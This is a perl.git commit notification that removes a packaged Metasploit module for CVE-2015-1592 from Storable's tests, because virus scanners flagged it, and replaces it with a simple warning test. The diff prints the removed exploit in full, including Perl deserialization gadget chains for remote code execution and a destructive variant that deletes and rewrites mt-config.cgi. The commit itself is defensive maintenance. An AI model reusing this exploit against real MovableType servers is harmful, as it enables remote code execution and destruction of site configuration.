In perl.git, the branch blead has been updated


- Log -----------------------------------------------------------------
commit fb5f378b17e3b41db03064c19b9205db64a3354c
Author: Tony Cook <>
Date:   Mon Dec 3 16:15:52 2018 +1100

    (perl #133706) remove exploit code from Storable
    Storable packaged the metasploit framework code for CVE-2015-1592,
    which triggered virus scanners.
    To prevent that remove the packaged exploit code and test for the
    underlying structure we trigger the warning on.


Summary of changes:
 MANIFEST                          |   1 -
 dist/Storable/t/ | 261 --------------------------------------
 dist/Storable/t/CVE-2015-1592.t   |  25 ++--
 3 files changed, 12 insertions(+), 275 deletions(-)
 delete mode 100644 dist/Storable/t/

diff --git a/MANIFEST b/MANIFEST
index 566e98310e..4276316980 100644
@@ -3662,7 +3662,6 @@ dist/Storable/t/code.t                    See if Storable 
 dist/Storable/t/compat01.t             See if Storable works
 dist/Storable/t/compat06.t             See if Storable works
 dist/Storable/t/croak.t                        See if Storable works
-dist/Storable/t/      See if Storable works
 dist/Storable/t/CVE-2015-1592.t                See if Storable works
 dist/Storable/t/dclone.t               See if Storable works
 dist/Storable/t/destroy.t              Test Storable in global destructon
diff --git a/dist/Storable/t/ 
deleted file mode 100644
index 481dba5307..0000000000
--- a/dist/Storable/t/
+++ /dev/null
@@ -1,261 +0,0 @@
-class MetasploitModule < Msf::Exploit::Remote
-  Rank = GoodRanking
-  include Msf::Exploit::Remote::HttpClient
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'SixApart MovableType Storable Perl Code Execution',
-      'Description'    => %q{
-          This module exploits a serialization flaw in MovableType before 
5.2.12 to execute
-          arbitrary code. The default nondestructive mode depends on the 
target server having
-          the Object::MultiType and DateTime Perl modules installed in Perl's 
@INC paths.
-          The destructive mode of operation uses only required MovableType 
-          but it will noticeably corrupt the MovableType installation.
-      },
-      'Author'         =>
-        [
-          'John Lightsey',
-        ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2015-1592' ],
-          [ 'URL', 
-        ],
-      'Privileged'     => false, # web server context
-      'Payload'        =>
-        {
-          'DisableNops' => true,
-          'BadChars'    => ' ',
-          'Space'       => 1024,
-        },
-      'Compat'         =>
-        {
-          'PayloadType' => 'cmd'
-        },
-      'Platform'       => ['unix'],
-      'Arch'           => ARCH_CMD,
-      'Targets'        => [['Automatic', {}]],
-      'DisclosureDate' => 'Feb 11 2015',
-      'DefaultTarget'  => 0))
-    register_options(
-      [
-'TARGETURI', [true, 'MoveableType cgi-bin directory 
path', '/cgi-bin/mt/']),
-'DESTRUCTIVE', [true, 'Use destructive attack method (more 
likely to succeed, but corrupts target system.)', false])
-      ], self.class
-    )
-  end
-# generate config parameters for injection checks
-use Storable;
-    package XXXCHECKXXX;
-    sub STORABLE_thaw {
-        return 1;
-    }
-    sub STORABLE_freeze {
-        return 1;
-    }
-my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
-my $frozen2 = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x 
=> $check_obj});
-$frozen2 = unpack 'H*', $frozen2;
-#print "LFI test for storable flaw is: $frozen2\n";
-    package DateTime;
-    use overload '+' => sub { 'ignored' };
-  def check
-    vprint_status("Sending storable test injection for load 
-    res = send_request_cgi({
-        'method'    => 'GET',
-        'uri'       => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
-        'vars_get' => {
-          '__mode' => 'retry',
-          'step'   => 'configure',
-          'config' => 
-        }
-      })
-    unless res && res.code == 200 && res.body.include?("Can't locate")
-      vprint_status("Failed load test");
-      return Exploit::CheckCode::Safe
-    end
-    Exploit::CheckCode::Vulnerable
-  end
-  def exploit
-    if datastore['DESTRUCTIVE']
-      exploit_destructive
-    else
-      exploit_nondestructive
-    end
-  end
-# Generate nondestructive config parameter for RCE via Object::MultiType
-# and Try::Tiny. The generated value requires minor modification to insert
-# the payload inside the system() call and resize the padding.
-use Storable;
-    package Object::MultiType;
-    use overload '+' => sub { 'ingored' };
-    package Object::MultiType::Saver;
-#    package DateTime;
-#    use overload '+' => sub { 'ingored' };
-    package Try::Tiny::ScopeGuard;
-my $try_tiny_loader = bless {}, 'DateTime';
-my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
-my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
-my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: 
text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 
-my $data = [$try_tiny_loader, $try_tiny_executor];
-my $frozen1 = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . 
-$frozen1 = unpack 'H*', $frozen1;
-#print "RCE payload requiring Object::MultiType and DateTime: $frozen1\n";
-  def exploit_nondestructive
-    print_status("Using nondestructive attack method")
-    config_payload = 
-    config_payload <<  payload.encoded.unpack('H*')[0]
-    config_payload << "7d293b"
-    config_payload << "23" * (1025 - payload.encoded.length)
-    config_payload << "0a657869743b"
-    print_status("Sending payload (#{payload.raw.length} bytes)")
-    send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
-      'vars_get' => {
-        '__mode' => 'retry',
-        'step'   => 'configure',
-        'config' => config_payload
-      }
-    }, 5)
-  end
-# Generate destructive config parameter to unlink mt-config.cgi
-use Storable;
-    package CGITempFile;
-my $unlink_target = "mt-config.cgi";
-my $cgitempfile = bless \$unlink_target, "CGITempFile";
-$data = [$cgitempfile];
-my $frozen_data = Storable::freeze($data);
-my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . $frozen_data;
-$frozen = unpack 'H*', $frozen;
-#print "RCE unlink payload requiring CGI: $frozen\n";
-# $Storable::DEBUGME = 1;
-# $^W = 1;
-def exploit_destructive
-    print_status("Using destructive attack method")
-    # First we need to delete mt-config.cgi using the storable injection
-    print_status("Sending storable injection to unlink mt-config.cgi")
-    res = send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
-      'vars_get' => {
-        '__mode' => 'retry',
-        'step'   => 'configure',
-        'config' => 
-      }
-    })
-    if res && res.code == 200
-      print_status("Successfully sent unlink request")
-    else
-      fail_with(Failure::Unknown, "Error sending unlink request")
-    end
-    # Now we rewrite mt-config.cgi to accept a payload
-    print_status("Rewriting mt-config.cgi to accept the payload")
-    res = send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
-      'vars_get'  => {
-        '__mode'             => 'next_step',
-        'step'               => 'optional',
-        'default_language'   => 'en_us',
-        'email_address_main' => "x\nObjectDriver mysql;use CGI;print 
qq{Content-type: text/plain\\n\\n};if(my $c = 
-        'set_static_uri_to'  => '/',
-        'config'             => 
 # equivalent to 'set_static_file_to' => '/',
-      }
-    })
-    if res && res.code == 200
-      print_status("Successfully sent mt-config rewrite request")
-    else
-      fail_with(Failure::Unknown, "Error sending mt-config rewrite request")
-    end
-    # Finally send the payload
-    print_status("Sending payload request")
-    send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => normalize_uri(target_uri.path, 'mt.cgi'),
-      'vars_get'  => {
-        'xyzzy'   => payload.encoded,
-      }
-    }, 5)
-  end
diff --git a/dist/Storable/t/CVE-2015-1592.t b/dist/Storable/t/CVE-2015-1592.t
index 2730cdc9d1..a71f44c0cb 100644
--- a/dist/Storable/t/CVE-2015-1592.t
+++ b/dist/Storable/t/CVE-2015-1592.t
@@ -1,22 +1,21 @@
 use strict;
+use warnings;
 use Test::More;
+use Storable qw(freeze thaw);
 plan tests => 1;
-use File::Temp qw(tempdir);
-use File::Spec;
-my $tmp_dir = tempdir(CLEANUP => 1);
-my $tmp_file = File::Spec->catfile($tmp_dir, 'sploit');
+# this original worked with the packaged exploit, but that
+# triggers virus scanners, so test for the behaviour instead
+my $x = bless \(my $y = "mt-config.cgi"), "CGITempFile";
+my $frozen = freeze($x);
-my $file = __FILE__;
-$file =~ s/\.t$/.inc/;
-my $inc = $ENV{PERL_CORE} ? "-Ilib -I../../lib" : "-I".join(" -I", @INC);
-system qq($^X $inc -w "$file" 2>$tmp_file);
-open(my $fh, "<", $tmp_file) or die "$tmp_file $!";
-  local $/;
-  my $err = <$fh>;
-  like($err, qr/SECURITY: Movable-Type CVE-2015-1592 Storable metasploit 
-       'Detect CVE-2015-1592');
+    my $warnings = '';
+    local $SIG{__WARN__} = sub { $warnings .= "@_" };
+    thaw($frozen);
+    like($warnings, qr/SECURITY: Movable-Type CVE-2015-1592 Storable 
metasploit attack/,
+         'Detect CVE-2015-1592');

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